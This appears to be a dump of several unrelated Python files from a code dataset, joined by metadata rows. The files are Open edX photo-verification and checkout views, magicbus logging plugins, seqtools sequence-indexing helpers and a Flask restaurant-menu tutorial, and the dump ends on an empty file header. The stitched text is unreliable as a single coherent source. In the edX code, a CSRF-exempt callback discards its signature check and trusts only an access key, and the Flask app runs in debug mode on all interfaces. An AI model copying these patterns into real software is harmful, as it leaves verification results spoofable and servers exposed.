if url is not None:
url = self.add_utm_params_to_url(url)
return redirect(url)
def _get_paid_mode(self, course_key):
"""
Retrieve the paid course mode for a course.
The returned course mode may or may not be expired.
Unexpired modes are preferred to expired modes.
Arguments:
course_key (CourseKey): The location of the course.
Returns:
CourseMode tuple
"""
# Retrieve all the modes at once to reduce the number of database queries
all_modes, unexpired_modes = CourseMode.all_and_unexpired_modes_for_courses([course_key])
# Retrieve the first mode that matches the following criteria:
# * Unexpired
# * Price > 0
# * Not credit
for mode in unexpired_modes[course_key]:
if mode.min_price > 0 and not CourseMode.is_credit_mode(mode):
return mode
# Otherwise, find the first non credit expired paid mode
for mode in all_modes[course_key]:
if mode.min_price > 0 and not CourseMode.is_credit_mode(mode):
return mode
# Otherwise, return None and so the view knows to respond with a 404.
return None
def _display_steps(self, always_show_payment, already_verified, already_paid, course_mode):
"""Determine which steps to display to the user.
Includes all steps by default, but removes steps
if the user has already completed them.
Arguments:
always_show_payment (bool): If True, display the payment steps
even if the user has already paid.
already_verified (bool): Whether the user has submitted
a verification request recently.
already_paid (bool): Whether the user is enrolled in a paid
course mode.
Returns:
list
"""
display_steps = self.ALL_STEPS
remove_steps = set()
if already_verified or not CourseMode.is_verified_mode(course_mode):
remove_steps |= set(self.VERIFICATION_STEPS)
if already_paid and not always_show_payment:
remove_steps |= set(self.PAYMENT_STEPS)
else:
# The "make payment" step doubles as an intro step,
# so if we're showing the payment step, hide the intro step.
remove_steps |= set([self.INTRO_STEP])
return [
{
'name': step,
'title': unicode(self.STEP_TITLES[step]),
}
for step in display_steps
if step not in remove_steps
]
def _requirements(self, display_steps, is_active):
"""Determine which requirements to show the user.
For example, if the user needs to submit a photo
verification, tell the user that she will need
a photo ID and a webcam.
Arguments:
display_steps (list): The steps to display to the user.
is_active (bool): If False, adds a requirement to activate the user account.
Returns:
dict: Keys are requirement names, values are booleans
indicating whether to show the requirement.
"""
all_requirements = {
self.ACCOUNT_ACTIVATION_REQ: not is_active,
self.PHOTO_ID_REQ: False,
self.WEBCAM_REQ: False,
}
# Remove the account activation requirement if disabled via waffle
if is_account_activation_requirement_disabled():
all_requirements.pop(self.ACCOUNT_ACTIVATION_REQ)
display_steps = set(step['name'] for step in display_steps)
for step, step_requirements in self.STEP_REQUIREMENTS.iteritems():
if step in display_steps:
for requirement in step_requirements:
all_requirements[requirement] = True
return all_requirements
def _verification_valid_until(self, user, date_format="%m/%d/%Y"):
"""
Check whether the user has a valid or pending verification.
Arguments:
user:
date_format: optional parameter for formatting datetime
object to string in response
Returns:
datetime object in string format
"""
photo_verifications = SoftwareSecurePhotoVerification.verification_valid_or_pending(user)
# return 'expiration_datetime' of latest photo verification if found,
# otherwise implicitly return ''
if photo_verifications:
return photo_verifications[0].expiration_datetime.strftime(date_format)
return ''
def _check_already_verified(self, user):
"""Check whether the user has a valid or pending verification.
Note that this includes cases in which the user's verification
has not been accepted (either because it hasn't been processed,
or there was an error).
This should return True if the user has done their part:
submitted photos within the expiration period.
"""
return SoftwareSecurePhotoVerification.user_has_valid_or_pending(user)
def _check_enrollment(self, user, course_key):
"""Check whether the user has an active enrollment and has paid.
If a user is enrolled in a paid course mode, we assume
that the user has paid.
Arguments:
user (User): The user to check.
course_key (CourseKey): The key of the course to check.
Returns:
Tuple `(has_paid, is_active)` indicating whether the user
has paid and whether the user has an active account.
"""
enrollment_mode, is_active = CourseEnrollment.enrollment_mode_for_user(user, course_key)
has_paid = False
if enrollment_mode is not None and is_active:
all_modes = CourseMode.modes_for_course_dict(course_key, include_expired=True)
course_mode = all_modes.get(enrollment_mode)
has_paid = (course_mode and course_mode.min_price > 0)
return (has_paid, bool(is_active))
def _response_if_deadline_passed(self, course, deadline_name, deadline_datetime):
"""
Respond with some error messaging if the deadline has passed.
Arguments:
course (Course): The course the user is trying to enroll in.
deadline_name (str): One of the deadline constants.
deadline_datetime (datetime): The deadline.
Returns: HttpResponse or None
"""
if deadline_name not in [self.VERIFICATION_DEADLINE, self.UPGRADE_DEADLINE]:
log.error("Invalid deadline name %s. Skipping check for whether the deadline passed.", deadline_name)
return None
deadline_passed = (
deadline_datetime is not None and
deadline_datetime < datetime.datetime.now(UTC)
)
if deadline_passed:
context = {
'course': course,
'deadline_name': deadline_name,
'deadline': deadline_datetime
}
return render_to_response("verify_student/missed_deadline.html", context)
def checkout_with_ecommerce_service(user, course_key, course_mode, processor):
""" Create a new basket and trigger immediate checkout, using the E-Commerce API. """
course_id = unicode(course_key)
try:
api = ecommerce_api_client(user)
# Make an API call to create the order and retrieve the results
result = api.baskets.post({
'products': [{'sku': course_mode.sku}],
'checkout': True,
'payment_processor_name': processor
})
# Pass the payment parameters directly from the API response.
return result.get('payment_data')
except SlumberBaseException:
params = {'username': user.username, 'mode': course_mode.slug, 'course_id': course_id}
log.exception('Failed to create order for %(username)s %(mode)s mode of %(course_id)s', params)
raise
finally:
audit_log(
'checkout_requested',
course_id=course_id,
mode=course_mode.slug,
processor_name=processor,
user_id=user.id
)
def checkout_with_shoppingcart(request, user, course_key, course_mode, amount):
""" Create an order and trigger checkout using shoppingcart."""
cart = Order.get_cart_for_user(user)
cart.clear()
enrollment_mode = course_mode.slug
CertificateItem.add_to_order(cart, course_key, amount, enrollment_mode)
# Change the order's status so that we don't accidentally modify it later.
# We need to do this to ensure that the parameters we send to the payment system
# match what we store in the database.
# (Ordinarily we would do this client-side when the user submits the form, but since
# the JavaScript on this page does that immediately, we make the change here instead.
# This avoids a second AJAX call and some additional complication of the JavaScript.)
# If a user later re-enters the verification / payment flow, she will create a new order.
cart.start_purchase()
callback_url = request.build_absolute_uri(
reverse("shoppingcart.views.postpay_callback")
)
payment_data = {
'payment_processor_name': settings.CC_PROCESSOR_NAME,
'payment_page_url': get_purchase_endpoint(),
'payment_form_data': get_signed_purchase_params(
cart,
callback_url=callback_url,
extra_data=[unicode(course_key), course_mode.slug]
),
}
return payment_data
@require_POST
@login_required
def create_order(request):
"""
This endpoint is named 'create_order' for backward compatibility, but its
actual use is to add a single product to the user's cart and request
immediate checkout.
"""
course_id = request.POST['course_id']
course_id = CourseKey.from_string(course_id)
donation_for_course = request.session.get('donation_for_course', {})
contribution = request.POST.get("contribution", donation_for_course.get(unicode(course_id), 0))
try:
amount = decimal.Decimal(contribution).quantize(decimal.Decimal('.01'), rounding=decimal.ROUND_DOWN)
except decimal.InvalidOperation:
return HttpResponseBadRequest(_("Selected price is not valid number."))
current_mode = None
sku = request.POST.get('sku', None)
if sku:
try:
current_mode = CourseMode.objects.get(sku=sku)
except CourseMode.DoesNotExist:
log.exception(u'Failed to find CourseMode with SKU [%s].', sku)
if not current_mode:
# Check if there are more than 1 paid(mode with min_price>0 e.g verified/professional/no-id-professional) modes
# for course exist then choose the first one
paid_modes = CourseMode.paid_modes_for_course(course_id)
if paid_modes:
if len(paid_modes) > 1:
log.warn(u"Multiple paid course modes found for course '%s' for create order request", course_id)
current_mode = paid_modes[0]
# Make sure this course has a paid mode
if not current_mode:
log.warn(u"Create order requested for course '%s' without a paid mode.", course_id)
return HttpResponseBadRequest(_("This course doesn't support paid certificates"))
if CourseMode.is_professional_mode(current_mode):
amount = current_mode.min_price
if amount < current_mode.min_price:
return HttpResponseBadRequest(_("No selected price or selected price is below minimum."))
if current_mode.sku:
# if request.POST doesn't contain 'processor' then the service's default payment processor will be used.
payment_data = checkout_with_ecommerce_service(
request.user,
course_id,
current_mode,
request.POST.get('processor')
)
else:
payment_data = checkout_with_shoppingcart(request, request.user, course_id, current_mode, amount)
if 'processor' not in request.POST:
# (XCOM-214) To be removed after release.
# the absence of this key in the POST payload indicates that the request was initiated from
# a stale js client, which expects a response containing only the 'payment_form_data' part of
# the payment data result.
payment_data = payment_data['payment_form_data']
return HttpResponse(json.dumps(payment_data), content_type="application/json")
class SubmitPhotosView(View):
"""
End-point for submitting photos for verification.
"""
@method_decorator(transaction.non_atomic_requests)
def dispatch(self, *args, **kwargs): # pylint: disable=missing-docstring
return super(SubmitPhotosView, self).dispatch(*args, **kwargs)
@method_decorator(login_required)
@method_decorator(outer_atomic(read_committed=True))
def post(self, request):
"""
Submit photos for verification.
This end-point is used for the following cases:
* Initial verification through the pay-and-verify flow.
* Initial verification initiated from a checkpoint within a course.
* Re-verification initiated from a checkpoint within a course.
POST Parameters:
face_image (str): base64-encoded image data of the user's face.
photo_id_image (str): base64-encoded image data of the user's photo ID.
full_name (str): The user's full name, if the user is requesting a name change as well.
course_key (str): Identifier for the course, if initiated from a checkpoint.
checkpoint (str): Location of the checkpoint in the course.
"""
# If the user already has an initial verification attempt, we can re-use the photo ID
# the user submitted with the initial attempt.
initial_verification = SoftwareSecurePhotoVerification.get_initial_verification(request.user)
# Validate the POST parameters
params, response = self._validate_parameters(request, bool(initial_verification))
if response is not None:
return response
# If necessary, update the user's full name
if "full_name" in params:
response = self._update_full_name(request.user, params["full_name"])
if response is not None:
return response
# Retrieve the image data
# Validation ensures that we'll have a face image, but we may not have
# a photo ID image if this is a reverification.
face_image, photo_id_image, response = self._decode_image_data(
params["face_image"], params.get("photo_id_image")
)
# If we have a photo_id we do not want use the initial verification image.
if photo_id_image is not None:
initial_verification = None
if response is not None:
return response
# Submit the attempt
attempt = self._submit_attempt(request.user, face_image, photo_id_image, initial_verification)
self._fire_event(request.user, "edx.bi.verify.submitted", {"category": "verification"})
self._send_confirmation_email(request.user)
return JsonResponse({})
def _validate_parameters(self, request, has_initial_verification):
"""
Check that the POST parameters are valid.
Arguments:
request (HttpRequest): The request object.
has_initial_verification (bool): Whether the user has an initial verification attempt.
Returns:
HttpResponse or None
"""
# Pull out the parameters we care about.
params = {
param_name: request.POST[param_name]
for param_name in [
"face_image",
"photo_id_image",
"course_key",
"full_name"
]
if param_name in request.POST
}
# If the user already has an initial verification attempt, then we don't
# require the user to submit a photo ID image, since we can re-use the photo ID
# image from the initial attempt.
# If we don't have an initial verification OR a photo ID image, something has gone
# terribly wrong in the JavaScript. Log this as an error so we can track it down.
if "photo_id_image" not in params and not has_initial_verification:
log.error(
(
"User %s does not have an initial verification attempt "
"and no photo ID image data was provided. "
"This most likely means that the JavaScript client is not "
"correctly constructing the request to submit photos."
), request.user.id
)
return None, HttpResponseBadRequest(
_("Photo ID image is required if the user does not have an initial verification attempt.")
)
# The face image is always required.
if "face_image" not in params:
msg = _("Missing required parameter face_image")
return None, HttpResponseBadRequest(msg)
# If provided, parse the course key and checkpoint location
if "course_key" in params:
try:
params["course_key"] = CourseKey.from_string(params["course_key"])
except InvalidKeyError:
return None, HttpResponseBadRequest(_("Invalid course key"))
return params, None
def _update_full_name(self, user, full_name):
"""
Update the user's full name.
Arguments:
user (User): The user to update.
full_name (unicode): The user's updated full name.
Returns:
HttpResponse or None
"""
try:
update_account_settings(user, {"name": full_name})
except UserNotFound:
return HttpResponseBadRequest(_("No profile found for user"))
except AccountValidationError:
msg = _(
"Name must be at least {min_length} characters long."
).format(min_length=NAME_MIN_LENGTH)
return HttpResponseBadRequest(msg)
def _decode_image_data(self, face_data, photo_id_data=None):
"""
Decode image data sent with the request.
Arguments:
face_data (str): base64-encoded face image data.
Keyword Arguments:
photo_id_data (str): base64-encoded photo ID image data.
Returns:
tuple of (str, str, HttpResponse)
"""
try:
# Decode face image data (used for both an initial and re-verification)
face_image = decode_image_data(face_data)
# Decode the photo ID image data if it's provided
photo_id_image = (
decode_image_data(photo_id_data)
if photo_id_data is not None else None
)
return face_image, photo_id_image, None
except InvalidImageData:
msg = _("Image data is not valid.")
return None, None, HttpResponseBadRequest(msg)
def _submit_attempt(self, user, face_image, photo_id_image=None, initial_verification=None):
"""
Submit a verification attempt.
Arguments:
user (User): The user making the attempt.
face_image (str): Decoded face image data.
Keyword Arguments:
photo_id_image (str or None): Decoded photo ID image data.
initial_verification (SoftwareSecurePhotoVerification): The initial verification attempt.
"""
attempt = SoftwareSecurePhotoVerification(user=user)
# We will always have face image data, so upload the face image
attempt.upload_face_image(face_image)
# If an ID photo wasn't submitted, re-use the ID photo from the initial attempt.
# Earlier validation rules ensure that at least one of these is available.
if photo_id_image is not None:
attempt.upload_photo_id_image(photo_id_image)
elif initial_verification is None:
# Earlier validation should ensure that we never get here.
log.error(
"Neither a photo ID image or initial verification attempt provided. "
"Parameter validation in the view should prevent this from happening!"
)
# Submit the attempt
attempt.mark_ready()
attempt.submit(copy_id_photo_from=initial_verification)
return attempt
def _send_confirmation_email(self, user):
"""
Send an email confirming that the user submitted photos
for initial verification.
"""
context = {
'full_name': user.profile.name,
'platform_name': configuration_helpers.get_value("PLATFORM_NAME", settings.PLATFORM_NAME)
}
subject = _("Verification photos received")
message = render_to_string('emails/photo_submission_confirmation.txt', context)
from_address = configuration_helpers.get_value('email_from_address', settings.DEFAULT_FROM_EMAIL)
to_address = user.email
try:
send_mail(subject, message, from_address, [to_address], fail_silently=False)
except: # pylint: disable=bare-except
# We catch all exceptions and log them.
# It would be much, much worse to roll back the transaction due to an uncaught
# exception than to skip sending the notification email.
log.exception("Could not send notification email for initial verification for user %s", user.id)
def _fire_event(self, user, event_name, parameters):
"""
Fire an analytics event.
Arguments:
user (User): The user who submitted photos.
event_name (str): Name of the analytics event.
parameters (dict): Event parameters.
Returns: None
"""
if settings.LMS_SEGMENT_KEY:
tracking_context = tracker.get_tracker().resolve_context()
context = {
'ip': tracking_context.get('ip'),
'Google Analytics': {
'clientId': tracking_context.get('client_id')
}
}
analytics.track(user.id, event_name, parameters, context=context)
@require_POST
@csrf_exempt # SS does its own message signing, and their API won't have a cookie value
def results_callback(request):
"""
Software Secure will call this callback to tell us whether a user is
verified to be who they said they are.
"""
body = request.body
try:
body_dict = json.loads(body)
except ValueError:
log.exception("Invalid JSON received from Software Secure:\n\n{}\n".format(body))
return HttpResponseBadRequest("Invalid JSON. Received:\n\n{}".format(body))
if not isinstance(body_dict, dict):
log.error("Reply from Software Secure is not a dict:\n\n{}\n".format(body))
return HttpResponseBadRequest("JSON should be dict. Received:\n\n{}".format(body))
headers = {
"Authorization": request.META.get("HTTP_AUTHORIZATION", ""),
"Date": request.META.get("HTTP_DATE", "")
}
VERIFY_STUDENT = get_verify_student_settings()
api_access_key = VERIFY_STUDENT["API_ACCESS_KEY"]
api_secret_key = VERIFY_STUDENT["API_SECRET_KEY"]
body_for_signature = {"EdX-ID": body_dict["EdX-ID"]}
has_valid_signature(
"POST",
headers,
body_for_signature,
api_access_key,
api_secret_key
)
_response, access_key_and_sig = headers["Authorization"].split(" ")
access_key = access_key_and_sig.split(":")[0]
# This is what we should be doing...
#if not sig_valid:
# return HttpResponseBadRequest("Signature is invalid")
# This is what we're doing until we can figure out why we disagree on sigs
if access_key != api_access_key:
return HttpResponseBadRequest("Access key invalid")
receipt_id = body_dict.get("EdX-ID")
result = body_dict.get("Result")
reason = body_dict.get("Reason", "")
error_code = body_dict.get("MessageType", "")
try:
attempt = SoftwareSecurePhotoVerification.objects.get(receipt_id=receipt_id)
except SoftwareSecurePhotoVerification.DoesNotExist:
log.error("Software Secure posted back for receipt_id %s, but not found", receipt_id)
return HttpResponseBadRequest("edX ID {} not found".format(receipt_id))
if result == "PASS":
log.debug("Approving verification for %s", receipt_id)
attempt.approve()
status = "approved"
elif result == "FAIL":
log.debug("Denying verification for %s", receipt_id)
attempt.deny(json.dumps(reason), error_code=error_code)
status = "denied"
elif result == "SYSTEM FAIL":
log.debug("System failure for %s -- resetting to must_retry", receipt_id)
attempt.system_error(json.dumps(reason), error_code=error_code)
status = "error"
log.error("Software Secure callback attempt for %s failed: %s", receipt_id, reason)
else:
log.error("Software Secure returned unknown result %s", result)
return HttpResponseBadRequest(
"Result {} not understood. Known results: PASS, FAIL, SYSTEM FAIL".format(result)
)
return HttpResponse("OK!")
class ReverifyView(View):
"""
Reverification occurs when a user's initial verification is denied
or expires. When this happens, users can re-submit photos through
the re-verification flow.
Unlike in-course reverification, this flow requires users to submit
*both* face and ID photos. In contrast, during in-course reverification,
students submit only face photos, which are matched against the ID photo
the user submitted during initial verification.
"""
@method_decorator(login_required)
def get(self, request):
"""
Render the reverification flow.
Most of the work is done client-side by composing the same
Backbone views used in the initial verification flow.
"""
status, __ = SoftwareSecurePhotoVerification.user_status(request.user)
expiration_datetime = SoftwareSecurePhotoVerification.get_expiration_datetime(request.user)
can_reverify = False
if expiration_datetime:
if SoftwareSecurePhotoVerification.is_verification_expiring_soon(expiration_datetime):
# The user has an active verification, but the verification
# is set to expire within "EXPIRING_SOON_WINDOW" days (default is 4 weeks).
# In this case user can resubmit photos for reverification.
can_reverify = True
# If the user has no initial verification or if the verification
# process is still ongoing 'pending' or expired then allow the user to
# submit the photo verification.
# A photo verification is marked as 'pending' if its status is either
# 'submitted' or 'must_retry'.
if status in ["none", "must_reverify", "expired", "pending"] or can_reverify:
context = {
"user_full_name": request.user.profile.name,
"platform_name": configuration_helpers.get_value('PLATFORM_NAME', settings.PLATFORM_NAME),
"capture_sound": staticfiles_storage.url("audio/camera_capture.wav"),
}
return render_to_response("verify_student/reverify.html", context)
else:
context = {
"status": status
}
return render_to_response("verify_student/reverify_not_allowed.html", context)
|
agpl-3.0
| -2,058,498,461,421,042,700
| 39.008078
| 155
| 0.633919
| false
| 4.369266
| false
| false
| false
|
cherrypy/magicbus
|
magicbus/plugins/loggers.py
|
1
|
1912
|
"""Logging plugins for magicbus."""
from magicbus.compat import ntob, unicodestr
import datetime
import sys
from magicbus.plugins import SimplePlugin
class StreamLogger(SimplePlugin):
default_format = '[%(timestamp)s] (Bus %(bus)s) %(message)s\n'
def __init__(self, bus, stream, level=None, format=None, encoding='utf-8'):
SimplePlugin.__init__(self, bus)
self.stream = stream
self.level = level
self.format = format or self.default_format
self.encoding = encoding
def log(self, msg, level):
if self.level is None or self.level <= level:
params = {
'timestamp': ntob(datetime.datetime.now().isoformat()),
'bus': self.bus.id,
'message': msg,
'level': level
}
complete_msg = self.format % params
if self.encoding is not None:
if isinstance(complete_msg, unicodestr):
complete_msg = complete_msg.encode(self.encoding)
self.stream.write(complete_msg)
self.stream.flush()
class StdoutLogger(StreamLogger):
def __init__(self, bus, level=None, format=None, encoding='utf-8'):
StreamLogger.__init__(self, bus, sys.stdout, level, format, encoding)
class StderrLogger(StreamLogger):
def __init__(self, bus, level=None, format=None, encoding='utf-8'):
StreamLogger.__init__(self, bus, sys.stderr, level, format, encoding)
class FileLogger(StreamLogger):
def __init__(self, bus, filename=None, file=None,
level=None, format=None, encoding='utf8'):
self.filename = filename
if file is None:
if filename is None:
raise ValueError('Either file or filename MUST be supplied.')
file = open(filename, 'ab')
StreamLogger.__init__(self, bus, file, level, format, encoding)
|
bsd-3-clause
| 5,570,195,874,519,741,000
| 30.866667
| 79
| 0.599895
| false
| 4.059448
| false
| false
| false
|
nlgranger/LazyProc
|
seqtools/indexing.py
|
1
|
12939
|
from numbers import Integral
import itertools
import bisect
from array import array
from future.builtins import range
from .utils import isint, basic_getitem, basic_setitem, normalize_slice, \
get_logger
class Arange:
def __init__(self, start, stop=None, step=None):
if stop is None and step is None:
stop = start
start = 0
if step is None:
step = 1
if (stop - start) / step < 0:
stop = start
size = abs(stop - start) - 1
abs_step = abs(step)
numel = (size + abs_step - (size % abs_step)) // abs_step
stop = start + step * numel
self.start, self.stop, self.step = start, stop, step
def __len__(self):
return abs(self.stop - self.start) // abs(self.step)
def __iter__(self):
return iter(range(self.start, self.stop, self.step))
def __getitem__(self, key):
if isinstance(key, slice):
start, stop, step = normalize_slice(
key.start, key.stop, key.step, len(self))
numel = abs(stop - start) // abs(step)
start = self.start + self.step * start
step = self.step * step
stop = start + step * numel
return Arange(start, stop, step)
elif not isinstance(key, Integral):
raise TypeError(
self.__class__.__name__ + " indices must be integers or "
"slices, not " + key.__class__.__name__)
return self.start + self.step * key
def arange(start, stop=None, step=None):
"""Sequential equivalent of Python built-in :class:`python:range`."""
return Arange(start, stop, step)
class Gathering(object):
def __init__(self, sequence, indexes):
if isinstance(sequence, Gathering): # optimize nested subsets
indexes = array('l', (sequence.indexes[i] for i in indexes))
sequence = sequence.sequence
self.sequence = sequence
self.indexes = indexes
def __len__(self):
return len(self.indexes)
def __iter__(self):
for i in self.indexes:
yield self.sequence[i]
def __getitem__(self, key):
if isinstance(key, slice):
return gather(self.sequence, self.indexes[key])
elif isint(key):
if key < -len(self) or key >= len(self):
raise IndexError(
self.__class__.__name__ + " index out of range")
if key < 0:
key = len(self) + key
return self.sequence[self.indexes[key]]
else:
raise TypeError(
self.__class__.__name__ + " indices must be integers or "
"slices, not " + key.__class__.__name__)
def __setitem__(self, key, value):
if isinstance(key, slice):
indexes = self.indexes[key]
if len(indexes) != len(value):
raise ValueError(self.__class__.__name__ + " only support "
"one-to-one assignment")
for i, val in zip(indexes, value):
self.sequence[i] = val
elif isint(key):
if key < -len(self) or key >= len(self):
raise IndexError(
self.__class__.__name__ + " index out of range")
if key < 0:
key = len(self) + key
self.sequence[self.indexes[key]] = value
else:
raise TypeError(
self.__class__.__name__ + " indices must be integers or "
"slices, not " + key.__class__.__name__)
def gather(sequence, indexes):
"""Return a view on the sequence reordered by indexes.
.. image:: _static/gather.png
:alt: gather
:width: 15%
:align: center
Example:
>>> arr = ['d', 'e', 'h', 'l', 'o', 'r', 'w', ' ']
>>> idx = [2, 1, 3, 3, 4, 7, 6, 4, 5, 3, 0]
>>> list(seqtools.gather(arr, idx))
['h', 'e', 'l', 'l', 'o', ' ', 'w', 'o', 'r', 'l', 'd']
"""
return Gathering(sequence, indexes)
def take(sequence, indexes):
"""Alias for :func:`seqtools.gather`."""
return gather(sequence, indexes)
def reindex(sequence, indexes):
logger = get_logger(__name__)
logger.warning(
"Call to deprecated function reindex, use gather instead",
category=DeprecationWarning,
stacklevel=2)
return gather(sequence, indexes)
class Cycle:
def __init__(self, sequence, size):
self.sequence = sequence
self.size = int(size)
def __len__(self):
return self.size
def __iter__(self):
i = 0
while True:
for v in self.sequence:
yield v
i += 1
if i == self.size:
return
@basic_getitem
def __getitem__(self, key):
return self.sequence[key % len(self.sequence)]
@basic_setitem
def __setitem__(self, key, value):
self.sequence[key % len(self.sequence)] = value
class InfiniteCycle:
def __init__(self, sequence):
self.sequence = sequence
def __iter__(self):
while True:
for v in self.sequence:
yield v
def __getitem__(self, key):
if isinstance(key, slice):
start, stop, step = key.start, key.stop, key.step
if start is None:
start = 0
if start < 0 or stop is None or stop < 0:
raise IndexError(
"Cannot use indices relative to length on "
+ self.__class__.__name__)
offset = start - start % len(self.sequence)
start -= offset
stop -= offset
return Cycle(self.sequence, stop)[start:stop:step]
elif isint(key):
if key < 0:
raise IndexError(
"Cannot use indices relative to length on "
+ self.__class__.__name__)
return self.sequence[key % len(self.sequence)]
else:
raise TypeError(
self.__class__.__name__ + " indices must be integers or "
"slices, not " + key.__class__.__name__)
def cycle(sequence, limit=None):
"""Return repeated view of a sequence.
Args:
sequence (Sequence): The sequence to be repeated.
limit (Optional[int]): An optional size limit.
.. image:: _static/cycle.png
:alt: collate
:width: 10%
:align: center
Example:
>>> data = ['a', 'b', 'c']
>>> loop = seqtools.cycle(data)
>>> loop[3]
'a'
>>> loop[3 * 10 ** 9 + 1] # unbounded sequence
'b'
>>> loop = seqtools.cycle(data, 7)
>>> list(loop)
['a', 'b', 'c', 'a', 'b', 'c', 'a']
"""
return InfiniteCycle(sequence) if limit is None else Cycle(sequence, limit)
class Interleaving(object):
def __init__(self, sequences):
offsets_in = [0] # end of sequences in input indexing
offsets_out = [0] # end of sequences in output indexing
whose_offset = sorted(range(len(sequences)),
key=lambda k: len(sequences[k]))
for i, n_seq_left in zip(whose_offset, range(len(sequences), 0, -1)):
n_new_out_items = (len(sequences[i]) - offsets_in[-1]) * n_seq_left
offsets_out.append(offsets_out[-1] + n_new_out_items)
offsets_in.append(len(sequences[i]))
self.sequences = sequences
self.n_seqs = len(sequences)
self.offsets_in = array('i', offsets_in)
self.offsets_out = array('i', offsets_out)
self.remaining_seqs = [sorted(whose_offset[i:])
for i in range(len(sequences))]
def __len__(self):
return sum(map(len, self.sequences))
def _convert_1d_key(self, key):
# given index in interleaved sequences, return sequence and offset
n_exhausted = bisect.bisect(self.offsets_out, key) - 1
n_remaining_seqs = self.n_seqs - n_exhausted
key -= self.offsets_out[n_exhausted]
seq = self.remaining_seqs[n_exhausted][key % n_remaining_seqs]
idx = self.offsets_in[n_exhausted] + key // n_remaining_seqs
return seq, idx
def __iter__(self):
iterators = [iter(seq) for seq in self.sequences]
i = -1
while len(iterators) > 0:
i = (i + 1) % len(iterators)
try:
yield next(iterators[i])
except StopIteration:
del iterators[i]
i -= 1
@basic_getitem
def __getitem__(self, key):
seq, idx = self._convert_1d_key(key)
return self.sequences[seq][idx]
@basic_setitem
def __setitem__(self, key, value):
seq, idx = self._convert_1d_key(key)
self.sequences[seq][idx] = value
def interleave(*sequences):
"""Interleave elements from several sequences into one.
Sequences don't need to have the same length, the cycling will
operate between whatever sequences are left.
.. image:: _static/interleaving.png
:alt: interleaving
:width: 30%
:align: center
Example:
>>> arr1 = [ 1, 2, 3, 4, 5]
>>> arr2 = ['a', 'b', 'c']
>>> arr3 = [.1, .2, .3, .4]
>>> list(interleave(arr1, arr2, arr3))
[1, 'a', 0.1, 2, 'b', 0.2, 3, 'c', 0.3, 4, 0.4, 5]
"""
return Interleaving(sequences)
class Repetition(object):
def __init__(self, item, times):
self.object = item
self.times = times
def __len__(self):
return self.times
def __iter__(self):
return itertools.repeat(self.object, self.times)
@basic_getitem
def __getitem__(self, item):
return self.object
@basic_setitem
def __setitem__(self, key, value):
self.object = value
class InfiniteRepetition(object):
def __init__(self, value):
self.value = value
def __iter__(self):
return itertools.repeat(self.value)
def __len__(self):
return 0
def __getitem__(self, key):
if isinstance(key, slice):
start, stop, step = key.start, key.stop, key.step
start = 0 if start is None else start
step = 1 if step is None else step
if start < 0 or stop is None or stop < 0:
raise IndexError(
"Cannot use indices relative to length on "
+ self.__class__.__name__)
if step == 0:
raise ValueError("slice step cannot be 0")
if (stop - start) * step <= 0:
return []
if step > 0:
stop += (step + stop - start) % step
else:
stop -= (-step + start - stop) % -step
return repeat(self.value, (stop - start) // step)
elif isint(key):
if key < 0:
raise IndexError(
"Cannot use indices relative to length on "
+ self.__class__.__name__)
return self.value
else:
raise TypeError(
self.__class__.__name__ + " indices must be integers or "
"slices, not " + key.__class__.__name__)
def __setitem__(self, key, value):
if isinstance(key, slice):
start, stop, step = key.start, key.stop, key.step
step = 1 if step is None else step
if start < 0 or stop is None or stop < 0:
raise IndexError(
"Cannot use indices relative to length on "
+ self.__class__.__name__)
if step == 0:
raise ValueError("slice step cannot be 0")
if (stop - start) * step > 0:
self.value = value[-1]
elif isint(key):
if key < 0:
raise IndexError(
"Cannot use indices relative to length on "
+ self.__class__.__name__)
self.value = value
else:
raise TypeError(
self.__class__.__name__ + " indices must be integers or "
"slices, not " + key.__class__.__name__)
def repeat(value, times=None):
"""Make a sequence by repeating a value.
Args:
value (Any): Value to be (virtually) replicated.
times (Optional[int]): Optional size limit.
.. image:: _static/repeat.png
:alt: repeat
:width: 10%
:align: center
Example:
>>> item = 3
>>> repetition = seqtools.repeat(item, 10)
>>> list(repetition)
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3]
"""
if isint(times) and times > 1:
return Repetition(value, times)
elif times is None:
return InfiniteRepetition(value)
else:
raise TypeError("times must be a positive integer or None")
|
mpl-2.0
| 9,185,350,080,690,769,000
| 28.076404
| 79
| 0.515341
| false
| 4.02082
| false
| false
| false
|
tuanvu216/udacity-course
|
full_stack_foundations/full_stack_foundations_master/lesson_3/15_delete_menu_item_solution/project.py
|
1
|
2369
|
from flask import Flask, render_template, request, redirect, url_for
app = Flask(__name__)
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from database_setup import Base, Restaurant, MenuItem
engine = create_engine('sqlite:///restaurantmenu.db')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
@app.route('/')
@app.route('/restaurants/<int:restaurant_id>/menu')
def restaurantMenu(restaurant_id):
restaurant = session.query(Restaurant).filter_by(id = restaurant_id).one()
items = session.query(MenuItem).filter_by(restaurant_id = restaurant_id)
return render_template('menu.html', restaurant=restaurant, items = items, restaurant_id = restaurant_id)
@app.route('/restaurants/<int:restaurant_id>/new', methods=['GET','POST'])
def newMenuItem(restaurant_id):
if request.method == 'POST':
newItem = MenuItem(name = request.form['name'], description = request.form['description'], price = request.form['price'], course = request.form['course'], restaurant_id = restaurant_id)
session.add(newItem)
session.commit()
return redirect(url_for('restaurantMenu', restaurant_id = restaurant_id))
else:
return render_template('newmenuitem.html', restaurant_id = restaurant_id)
@app.route('/restaurants/<int:restaurant_id>/<int:menu_id>/edit', methods = ['GET', 'POST'])
def editMenuItem(restaurant_id, menu_id):
editedItem = session.query(MenuItem).filter_by(id = menu_id).one()
if request.method == 'POST':
if request.form['name']:
editedItem.name = request.form['name']
session.add(editedItem)
session.commit()
return redirect(url_for('restaurantMenu', restaurant_id = restaurant_id))
else:
return render_template('editmenuitem.html', restaurant_id = restaurant_id, menu_id = menu_id, item = editedItem)
#DELETE MENU ITEM SOLUTION
@app.route('/restaurants/<int:restaurant_id>/<int:menu_id>/delete', methods = ['GET','POST'])
def deleteMenuItem(restaurant_id, menu_id):
itemToDelete = session.query(MenuItem).filter_by(id = menu_id).one()
if request.method == 'POST':
session.delete(itemToDelete)
session.commit()
return redirect(url_for('restaurantMenu', restaurant_id = restaurant_id))
else:
return render_template('deleteconfirmation.html', item = itemToDelete)
if __name__ == '__main__':
app.debug = True
app.run(host = '0.0.0.0', port = 5000)
|
mit
| -4,962,088,156,317,859,000
| 36.015625
| 187
| 0.726889
| false
| 3.254121
| false
| false
| false
|
openai/universe
|
universe/envs/diagnostics.py
